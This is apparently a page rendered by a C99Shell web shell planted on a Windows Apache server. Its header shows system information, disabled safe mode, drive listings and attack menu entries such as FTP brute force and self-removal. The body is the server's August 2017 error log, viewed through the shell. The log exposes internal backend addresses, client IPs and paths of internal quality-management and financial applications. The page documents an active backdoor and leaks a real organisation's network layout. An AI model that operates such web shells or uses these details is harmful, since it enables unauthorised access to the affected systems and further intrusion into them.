!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2017.08.10.log (45.67 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Thu Aug 10 01:09:39.965388 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 01:37:02.788674 2017] [proxy:error] [pid 5492:tid 15808] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Thu Aug 10 01:37:02.788674 2017] [proxy:error] [pid 5492:tid 15808] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Thu Aug 10 01:37:02.788674 2017] [proxy_http:error] [pid 5492:tid 15808] [client 152.61.128.50:60706] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Thu Aug 10 01:37:03.038274 2017] [proxy:error] [pid 5492:tid 15808] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Aug 10 01:37:03.272275 2017] [proxy:error] [pid 5492:tid 15808] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Aug 10 01:59:59.320492 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 03:21:37.542895 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 06:22:44.696582 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 06:22:44.696582 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 06:49:31.313204 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 07:13:26.390925 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 09:09:44.987182 2017] [proxy_http:error] [pid 5492:tid 14492] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10183] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 09:09:44.987182 2017] [proxy:error] [pid 5492:tid 14492] [client 201.245.192.253:10183] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 09:09:45.111982 2017] [proxy_http:error] [pid 5492:tid 16956] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10185] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 10:24:11.199027 2017] [proxy_http:error] [pid 5492:tid 14736] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12495] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Session.asp
[Thu Aug 10 10:24:11.199027 2017] [proxy:error] [pid 5492:tid 14736] [client 201.245.192.253:12495] AH00898: Error reading from remote server returned by /isolucionsda/SesionNeutra.asp, referer: http://190.27.245.106/isolucionsda/Session.asp
[Thu Aug 10 10:39:13.957012 2017] [proxy_http:error] [pid 5492:tid 15824] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.154.253.106:52350] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 10:39:13.957012 2017] [proxy:error] [pid 5492:tid 15824] [client 186.154.253.106:52350] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Thu Aug 10 11:13:03.521577 2017] [mpm_winnt:warn] [pid 5492:tid 17616] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Aug 10 11:28:30.849606 2017] [proxy_http:error] [pid 5492:tid 15936] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:15889] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml
[Thu Aug 10 11:28:36.450016 2017] [proxy_http:error] [pid 5492:tid 16348] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22124] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FiltroNotaMejora.asp
[Thu Aug 10 11:28:36.450016 2017] [proxy:error] [pid 5492:tid 16348] [client 201.245.192.253:22124] AH00898: Error reading from remote server returned by /isolucionsda/NotaMejora.asp, referer: http://190.27.245.106/isolucionsda/FiltroNotaMejora.asp
[Thu Aug 10 11:28:39.570021 2017] [proxy_http:error] [pid 5492:tid 16932] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:28367] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Thu Aug 10 11:28:39.570021 2017] [proxy:error] [pid 5492:tid 16932] [client 201.245.192.253:28367] AH00898: Error reading from remote server returned by /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Thu Aug 10 11:28:41.832025 2017] [proxy:error] [pid 5492:tid 15664] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.43:7778 (172.22.1.43) failed
[Thu Aug 10 11:28:41.832025 2017] [proxy:error] [pid 5492:tid 15664] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.43) for 60s
[Thu Aug 10 11:28:41.832025 2017] [proxy_http:error] [pid 5492:tid 15664] [client 181.49.66.157:29001] AH01114: HTTP: failed to make connection to backend: 172.22.1.43
[Thu Aug 10 11:28:43.080027 2017] [proxy:error] [pid 5492:tid 16328] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:44.156429 2017] [proxy:error] [pid 5492:tid 14540] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:45.186031 2017] [proxy:error] [pid 5492:tid 15664] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:45.435632 2017] [proxy:error] [pid 5492:tid 14684] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:28:45.435632 2017] [proxy:error] [pid 5492:tid 14684] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.31) for 60s
[Thu Aug 10 11:28:45.435632 2017] [proxy_http:error] [pid 5492:tid 14684] [client 201.245.192.253:10239] AH01114: HTTP: failed to make connection to backend: 172.22.1.31, referer: http://190.27.245.106/isolucionsda/FiltroNotaMejora.asp
[Thu Aug 10 11:28:46.231233 2017] [proxy:error] [pid 5492:tid 14692] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:47.276435 2017] [proxy:error] [pid 5492:tid 15456] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:48.368437 2017] [proxy:error] [pid 5492:tid 16404] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:49.039238 2017] [proxy:error] [pid 5492:tid 15244] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:10454] AH01084: pass request body failed to 172.22.1.61:8080 (172.22.1.61), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Thu Aug 10 11:28:49.039238 2017] [proxy_http:error] [pid 5492:tid 15244] [client 201.245.192.253:10454] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 201.245.192.253 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Thu Aug 10 11:28:49.429239 2017] [proxy:error] [pid 5492:tid 14668] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:50.474440 2017] [proxy:error] [pid 5492:tid 15156] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:51.550842 2017] [proxy:error] [pid 5492:tid 16524] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:51.925243 2017] [proxy:error] [pid 5492:tid 15936] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:28:51.925243 2017] [proxy:error] [pid 5492:tid 15936] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:28:51.925243 2017] [proxy_http:error] [pid 5492:tid 15936] [client 201.245.192.253:22451] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudAnulacion/solicitudAnulacion.xhtml
[Thu Aug 10 11:28:52.050043 2017] [proxy:error] [pid 5492:tid 15936] AH00940: HTTP: disabled connection for (172.22.1.61)
[Thu Aug 10 11:28:52.580444 2017] [proxy:error] [pid 5492:tid 16348] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:53.656846 2017] [proxy:error] [pid 5492:tid 15576] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:57.728453 2017] [proxy:error] [pid 5492:tid 14540] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:58.789255 2017] [proxy:error] [pid 5492:tid 15156] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:28:59.865657 2017] [proxy:error] [pid 5492:tid 16348] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:00.910859 2017] [proxy:error] [pid 5492:tid 14540] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:01.956061 2017] [proxy:error] [pid 5492:tid 14724] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:02.595662 2017] [proxy:error] [pid 5492:tid 14500] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:29:02.595662 2017] [proxy_http:error] [pid 5492:tid 14500] [client 201.245.192.253:31706] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:29:03.001262 2017] [proxy:error] [pid 5492:tid 16760] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:04.062064 2017] [proxy:error] [pid 5492:tid 14540] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:05.122866 2017] [proxy:error] [pid 5492:tid 14724] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:06.214868 2017] [proxy:error] [pid 5492:tid 15936] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:07.260070 2017] [proxy:error] [pid 5492:tid 14684] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:08.320872 2017] [proxy_http:error] [pid 5492:tid 15244] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:32947] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 11:29:08.320872 2017] [proxy:error] [pid 5492:tid 15244] [client 201.245.192.253:32947] AH00898: Error reading from remote server returned by /IsolucionSDA/FrameSetGeneral.asp, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 11:29:08.336472 2017] [proxy:error] [pid 5492:tid 15244] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:09.397274 2017] [proxy:error] [pid 5492:tid 16216] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:10.114875 2017] [proxy:error] [pid 5492:tid 14692] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:29:10.114875 2017] [proxy_http:error] [pid 5492:tid 14692] [client 201.245.192.253:13154] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Thu Aug 10 11:29:10.458075 2017] [proxy:error] [pid 5492:tid 15936] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:10.926076 2017] [proxy_http:error] [pid 5492:tid 14668] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33257] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 11:29:10.926076 2017] [proxy:error] [pid 5492:tid 14668] [client 201.245.192.253:33257] AH00898: Error reading from remote server returned by /IsolucionSDA/FrameSetGeneral.asp, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 11:29:14.529683 2017] [proxy:error] [pid 5492:tid 14540] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:15.606085 2017] [proxy:error] [pid 5492:tid 15860] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:16.495286 2017] [proxy_http:error] [pid 5492:tid 14436] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34790] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 11:29:16.495286 2017] [proxy:error] [pid 5492:tid 14436] [client 201.245.192.253:34790] AH00898: Error reading from remote server returned by /IsolucionSDA/FrameSetGeneral.asp, referer: http://190.27.245.106/IsolucionSDA/Encabezado.asp?Pagina1=FrameSetGeneral.asp&&Pagina=MagazinHome.asp
[Thu Aug 10 11:29:16.682486 2017] [proxy:error] [pid 5492:tid 16700] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:17.727688 2017] [proxy:error] [pid 5492:tid 14540] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:19.006890 2017] [proxy:error] [pid 5492:tid 15860] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:20.067692 2017] [proxy:error] [pid 5492:tid 16524] AH00940: HTTP: disabled connection for (172.22.1.43)
[Thu Aug 10 11:29:32.766115 2017] [proxy:error] [pid 5492:tid 14500] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:29:32.766115 2017] [proxy:error] [pid 5492:tid 14500] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:29:32.766115 2017] [proxy_http:error] [pid 5492:tid 14500] [client 201.245.192.253:23431] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:29:33.187315 2017] [proxy:error] [pid 5492:tid 16700] AH00940: HTTP: disabled connection for (172.22.1.61)
[Thu Aug 10 11:29:36.790922 2017] [proxy:error] [pid 5492:tid 14588] AH00940: HTTP: disabled connection for (172.22.1.31)
[Thu Aug 10 11:29:37.898524 2017] [proxy:error] [pid 5492:tid 16564] AH00940: HTTP: disabled connection for (172.22.1.31)
[Thu Aug 10 11:29:41.392930 2017] [proxy:error] [pid 5492:tid 16476] AH00940: HTTP: disabled connection for (172.22.1.61)
[Thu Aug 10 11:29:44.918536 2017] [proxy:error] [pid 5492:tid 16240] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:29:44.918536 2017] [proxy_http:error] [pid 5492:tid 16240] [client 201.245.192.253:15826] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/
[Thu Aug 10 11:30:12.312184 2017] [proxy:error] [pid 5492:tid 14692] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:30:12.312184 2017] [proxy:error] [pid 5492:tid 14692] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:30:12.312184 2017] [proxy_http:error] [pid 5492:tid 14692] [client 201.245.192.253:13462] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:30:15.416590 2017] [proxy:error] [pid 5492:tid 16216] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:30:15.416590 2017] [proxy_http:error] [pid 5492:tid 16216] [client 201.245.192.253:13463] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:30:27.725011 2017] [proxy:error] [pid 5492:tid 15924] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:30:27.725011 2017] [proxy_http:error] [pid 5492:tid 15924] [client 201.245.192.253:28843] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:31:01.967071 2017] [proxy:error] [pid 5492:tid 16900] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:31:01.967071 2017] [proxy:error] [pid 5492:tid 16900] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.31) for 60s
[Thu Aug 10 11:31:01.967071 2017] [proxy_http:error] [pid 5492:tid 16900] [client 201.245.192.253:15430] AH01114: HTTP: failed to make connection to backend: 172.22.1.31, referer: http://190.27.245.106/isolucionsda/Session.asp?Continue=1
[Thu Aug 10 11:31:25.413912 2017] [proxy:error] [pid 5492:tid 14700] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:31:25.413912 2017] [proxy:error] [pid 5492:tid 14700] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:31:25.413912 2017] [proxy_http:error] [pid 5492:tid 14700] [client 201.245.192.253:23029] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:31:34.914329 2017] [proxy:error] [pid 5492:tid 16508] AH00940: HTTP: disabled connection for (172.22.1.61)
[Thu Aug 10 11:31:39.781538 2017] [proxy:error] [pid 5492:tid 15004] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:31:39.781538 2017] [proxy_http:error] [pid 5492:tid 15004] [client 201.245.192.253:16779] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:32:00.030373 2017] [proxy:error] [pid 5492:tid 14500] AH00940: HTTP: disabled connection for (172.22.1.31)
[Thu Aug 10 11:32:01.122375 2017] [proxy:error] [pid 5492:tid 15456] AH00940: HTTP: disabled connection for (172.22.1.31)
[Thu Aug 10 11:32:01.184775 2017] [proxy:error] [pid 5492:tid 15456] AH00940: HTTP: disabled connection for (172.22.1.31)
[Thu Aug 10 11:32:14.117198 2017] [proxy:error] [pid 5492:tid 15860] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:32:14.117198 2017] [proxy:error] [pid 5492:tid 15860] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:32:14.117198 2017] [proxy_http:error] [pid 5492:tid 15860] [client 201.245.192.253:19353] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:32:36.846438 2017] [proxy:error] [pid 5492:tid 15576] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:32:36.846438 2017] [proxy:error] [pid 5492:tid 15576] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.31) for 60s
[Thu Aug 10 11:32:36.846438 2017] [proxy_http:error] [pid 5492:tid 15576] [client 201.245.192.253:19342] AH01114: HTTP: failed to make connection to backend: 172.22.1.31, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=FiltroNotaMejora.asp&EsAbierta=1&ConMenu=NO
[Thu Aug 10 11:32:42.134847 2017] [proxy:error] [pid 5492:tid 14668] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:32:42.134847 2017] [proxy_http:error] [pid 5492:tid 14668] [client 201.245.192.253:19513] AH01114: HTTP: failed to make connection to backend: 172.22.1.31, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=FiltroNotaMejora.asp&EsAbierta=1&ConMenu=NO
[Thu Aug 10 11:32:44.662052 2017] [proxy:error] [pid 5492:tid 14732] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:32:44.662052 2017] [proxy_http:error] [pid 5492:tid 14732] [client 201.245.192.253:19930] AH01114: HTTP: failed to make connection to backend: 172.22.1.31, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=FiltroNotaMejora.asp&EsAbierta=1&ConMenu=NO
[Thu Aug 10 11:33:52.568971 2017] [proxy:error] [pid 5492:tid 14500] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:33:52.568971 2017] [proxy:error] [pid 5492:tid 14500] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:33:52.568971 2017] [proxy_http:error] [pid 5492:tid 14500] [client 201.245.192.253:14210] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Thu Aug 10 11:33:52.865371 2017] [proxy:error] [pid 5492:tid 14500] AH00940: HTTP: disabled connection for (172.22.1.61)
[Thu Aug 10 11:33:52.912172 2017] [proxy:error] [pid 5492:tid 14500] AH00940: HTTP: disabled connection for (172.22.1.61)
[Thu Aug 10 11:33:54.316174 2017] [proxy:error] [pid 5492:tid 15676] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:33:54.316174 2017] [proxy_http:error] [pid 5492:tid 15676] [client 201.245.192.253:33346] AH01114: HTTP: failed to make connection to backend: 172.22.1.61, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml
[Thu Aug 10 11:34:22.427423 2017] [proxy:error] [pid 5492:tid 14544] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.61:8080 (172.22.1.61) failed
[Thu Aug 10 11:34:22.427423 2017] [proxy:error] [pid 5492:tid 14544] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.61) for 60s
[Thu Aug 10 11:34:22.427423 2017] [proxy_http:error] [pid 5492:tid 14544] [client 201.245.192.253:23258] AH01114: HTTP: failed to make connection to backend: 172.22.1.61
[Thu Aug 10 11:36:14.357620 2017] [proxy:error] [pid 5492:tid 16348] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:36:14.357620 2017] [proxy:error] [pid 5492:tid 16348] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.31) for 60s
[Thu Aug 10 11:36:14.357620 2017] [proxy_http:error] [pid 5492:tid 16348] [client 201.245.192.253:32861] AH01114: HTTP: failed to make connection to backend: 172.22.1.31
[Thu Aug 10 11:36:15.605622 2017] [proxy:error] [pid 5492:tid 16564] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:36:15.605622 2017] [proxy_http:error] [pid 5492:tid 16564] [client 201.245.192.253:32862] AH01114: HTTP: failed to make connection to backend: 172.22.1.31
[Thu Aug 10 11:36:16.510424 2017] [proxy:error] [pid 5492:tid 15156] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.31:80 (172.22.1.31) failed
[Thu Aug 10 11:36:16.510424 2017] [proxy:error] [pid 5492:tid 15156] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.31) for 60s
[Thu Aug 10 11:36:16.510424 2017] [proxy_http:error] [pid 5492:tid 15156] [client 201.245.192.253:33222] AH01114: HTTP: failed to make connection to backend: 172.22.1.31, referer: http://190.27.245.106/IsolucionSDA/Session.asp
[Thu Aug 10 11:36:44.512473 2017] [proxy_http:error] [pid 5492:tid 14540] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:21433] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/autenticacion.xhtml
[Thu Aug 10 11:43:31.376788 2017] [proxy_http:error] [pid 5492:tid 15860] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 200.122.231.166:51492] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Aug 10 11:43:34.855594 2017] [proxy_http:error] [pid 5492:tid 15956] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 200.122.231.166:51495] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Aug 10 11:43:42.062806 2017] [proxy_http:error] [pid 5492:tid 14732] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 200.122.231.166:51488] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Thu Aug 10 12:08:55.250864 2017] [proxy_http:error] [pid 5492:tid 16932] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:24937] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
